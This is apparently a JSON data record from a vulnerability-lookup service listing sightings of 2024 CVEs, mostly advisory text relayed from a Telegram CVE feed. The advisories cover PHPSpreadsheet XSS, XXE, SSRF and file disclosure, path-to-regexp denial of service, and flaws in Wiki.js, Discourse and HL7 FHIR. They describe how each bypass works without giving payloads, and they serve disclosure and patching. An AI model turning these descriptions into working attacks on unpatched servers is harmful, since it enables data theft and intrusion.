{"vulnerability": "cve-2024-4529", "sightings": [{"uuid": "87c8ec80-e3ac-4728-b1df-bd05b362da83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602650357813905", "content": "", "creation_timestamp": "2024-12-05T22:47:59.577069Z"}, {"uuid": "4773a1b6-a391-46c9-bb72-895977cc829f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-45293.yaml", "content": "", "creation_timestamp": "2024-12-12T05:25:46.000000Z"}, {"uuid": "d706604d-26e9-4a2a-8849-3ee3e8c9f120", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45292", "type": "seen", "source": "https://t.me/cvedetector/7273", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45292 - PHPSpreadsheet Html Writer Cross-Site Scripting\", \n  \"Content\": \"CVE ID : CVE-2024-45292 \nPublished : Oct. 7, 2024, 8:15 p.m. | 24\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. `\\PhpOffice\\PhpSpreadsheet\\Writer\\Html` does not sanitize \"javascript:\" URLs from hyperlink `href` attributes, resulting in a Cross-Site Scripting vulnerability. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-07T22:39:27.000000Z"}, {"uuid": "c3f517f9-f285-49aa-9e69-ecab55f4cffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "seen", "source": "https://t.me/cvedetector/7265", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45293 - PHPSpreadsheet XXE Sensitive Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-45293 \nPublished : Oct. 7, 2024, 8:15 p.m. | 24\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. The security scanner responsible for preventing XXE attacks in the XLSX reader can be bypassed by slightly modifying the XML structure, utilizing white-spaces. On servers that allow users to upload their own Excel (XLSX) sheets, Server files and sensitive information can be disclosed by providing a crafted sheet. The security scan function in src/PhpSpreadsheet/Reader/Security/XmlScanner.php contains a flawed XML encoding check to retrieve the input file's XML encoding in the toUtf8 function. The function searches for the XML encoding through a defined regex which looks for `encoding=\"*\"` and/or `encoding='*'`, if not found, it defaults to the UTF-8 encoding which bypasses the conversion logic. This logic can be used to pass a UTF-7 encoded XXE payload, by utilizing a whitespace before or after the = in the attribute definition. Sensitive information disclosure through the XXE on sites that allow users to upload their own excel spreadsheets, and parse them using PHPSpreadsheet's Excel parser. This issue has been addressed in release versions 1.29.1, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-07T22:39:18.000000Z"}, {"uuid": "adb60ec2-86a7-4def-b595-30172976730e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45297", "type": "seen", "source": "https://t.me/cvedetector/7283", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45297 - Discourse Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45297 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : Discourse is an open source platform for community discussion. Users can see topics with a hidden tag if they know the label/name of that tag. This issue has been patched in the latest stable, beta and tests-passed version of Discourse. All users area are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:45.000000Z"}, {"uuid": "6356939d-6ffc-4b8e-914f-423e05e63b5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45291", "type": "seen", "source": "https://t.me/cvedetector/7282", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45291 - PHPSpreadsheet SSRF (Arbitrary File Read and Remote Code Execution)\", \n  \"Content\": \"CVE ID : CVE-2024-45291 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. It's possible for an attacker to construct an XLSX file that links images from arbitrary paths. When embedding images has been enabled in HTML writer with `$writer->setEmbedImages(true);` those files will be included in the output as `data:` URLs, regardless of the file's type. Also URLs can be used for embedding, resulting in a Server-Side Request Forgery vulnerability. When embedding images has been enabled, an attacker can read arbitrary files on the server and perform arbitrary HTTP GET requests. Note that any PHP protocol wrappers can be used, meaning that if for example the `expect://` wrapper is enabled, also remote code execution is possible. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. there are no known workarounds for this vulnerability. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:44.000000Z"}, {"uuid": "c037e3fd-3879-4598-94e1-ae36e9c9e5dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45290", "type": "seen", "source": "https://t.me/cvedetector/7281", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45290 - PhpSpreadsheet File URI Filter Disclosure vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45290 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted `php://filter` URLs an attacker can leak the contents of any file or URL. Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component. An attacker can access any file on the server, or leak information form arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 7.7 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:44.000000Z"}, {"uuid": "91b81c28-9685-475f-9b4e-3c32037414bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://t.me/cvedetector/5124", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45296 - Apache path-to-regexp DoS Regular Expression Generational Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45296 \nPublished : Sept. 9, 2024, 7:15 p.m. | 40\u00a0minutes ago \nDescription : path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-09T22:20:19.000000Z"}, {"uuid": "e0b39041-4bb3-4dce-a81c-e56a1e9baadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45298", "type": "seen", "source": "https://t.me/cvedetector/6003", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45298 - Wiki.js Account Restriction Bypass via Password Reset\", \n  \"Content\": \"CVE ID : CVE-2024-45298 \nPublished : Sept. 18, 2024, 5:15 p.m. | 40\u00a0minutes ago \nDescription : Wiki.js is an open source wiki app built on Node.js. A disabled user can still gain access to a wiki by abusing the password reset function. While setting up SMTP e-mail's on my server, I tested said e-mails by performing a password reset with my test user. To my shock, not only did it let me reset my password, but after resetting my password I can get into the wiki I was locked out of. The ramifications of this bug is a user can **bypass an account disabling by requesting their password be reset**.  All users of wiki.js version `2.5.303` who use any account restrictions and have disabled user are affected. This issue has been addressed in version 2.5.304 and all users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-18T20:05:51.000000Z"}, {"uuid": "1633e4cb-bae4-46f3-9e9c-ac6a6335c5c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45294", "type": "seen", "source": "https://t.me/cvedetector/4975", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45294 - \"HL7 FHIR Core XML External Entity Injection Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-45294 \nPublished : Sept. 6, 2024, 4:15 p.m. | 40\u00a0minutes ago \nDescription : The HL7 FHIR Core Artifacts repository provides the java core object handling code, with utilities (including validator), for the Fast Healthcare Interoperability Resources (FHIR) specification. Prior to version 6.3.23, XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML. This issue has been patched in release 6.3.23. No known workarounds are available. \nSeverity: 8.6 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:06:33.000000Z"}, {"uuid": "13012466-f50d-45b1-85ba-7eef9431360a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45294", "type": "seen", "source": "https://t.me/cvedetector/4983", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45295 - Apache vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45295 \nPublished : Sept. 6, 2024, 5:15 p.m. | 39\u00a0minutes ago \nDescription : Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-45294. Reason: This candidate is a duplicate of CVE-2024-45294. Notes: All CVE users should reference CVE-2024-45294 instead of this candidate. This CVE was issued to a vulnerability that is dependent on CVE-2024-45294. According to rule 4.2.15 of the CVE CNA rules, \"CNAs MUST NOT assign a different CVE ID to a Vulnerability that is fully interdependent with another Vulnerability. The Vulnerabilities are effectively the same single Vulnerability and MUST use one CVE ID.\" \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:56:50.000000Z"}, {"uuid": "f48b2573-1719-45c3-bfb9-cff3ba5c0010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45295", "type": "seen", "source": "https://t.me/cvedetector/4983", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45295 - Apache vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45295 \nPublished : Sept. 6, 2024, 5:15 p.m. | 39\u00a0minutes ago \nDescription : Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-45294. Reason: This candidate is a duplicate of CVE-2024-45294. Notes: All CVE users should reference CVE-2024-45294 instead of this candidate. This CVE was issued to a vulnerability that is dependent on CVE-2024-45294. According to rule 4.2.15 of the CVE CNA rules, \"CNAs MUST NOT assign a different CVE ID to a Vulnerability that is fully interdependent with another Vulnerability. The Vulnerabilities are effectively the same single Vulnerability and MUST use one CVE ID.\" \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T19:56:50.000000Z"}, {"uuid": "bab538ba-918a-4baa-b343-aafceec95f59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "2a0cbfb2-db9b-4cce-989f-a7ec747a8343", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45296", "type": "seen", "source": "https://t.me/cvedetector/12148", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-52798 - path-to-regexp turns path strings into a regular e\", \n  \"Content\": \"CVE ID : CVE-2024-52798 \nPublished : Dec. 5, 2024, 11:15 p.m. | 42\u00a0minutes ago \nDescription : path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-06T01:23:56.000000Z"}, {"uuid": "80b27679-76e1-45e7-93ba-5e6bf44d1ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45299", "type": "seen", "source": "https://t.me/cvedetector/4962", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45299 - alf.io Unescaped Text Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45299 \nPublished : Sept. 6, 2024, 1:15 p.m. | 23\u00a0minutes ago \nDescription : alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5, the preloaded data as json is not escaped correctly, the administrator / event admin could break their own install by inserting non correctly escaped text. The Content-Security-Policy directive blocks any potential script execution. The administrator or event administrator can override the texts for customization purpose. The texts are not properly escaped. Version 2.0-M5 fixes this issue. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-06T15:46:00.000000Z"}, {"uuid": "1c764d51-70f1-4426-80ef-da72a5269882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45292", "type": "seen", "source": "Telegram/oJP4qItMuRLF_d8pKEvI9dzkUh7fXmzMd6ELp7Xw-az4Jzf3", "content": "", "creation_timestamp": "2025-03-08T04:35:51.000000Z"}, {"uuid": "ddea089c-e595-43b6-ab6f-d0e936ee5504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45293", "type": "seen", "source": "Telegram/EE3pHbPRRhxISM-XwfNigq155t5OMi9Cg7kQXW9PN89zqyYI", "content": "", "creation_timestamp": "2025-03-08T04:35:51.000000Z"}]}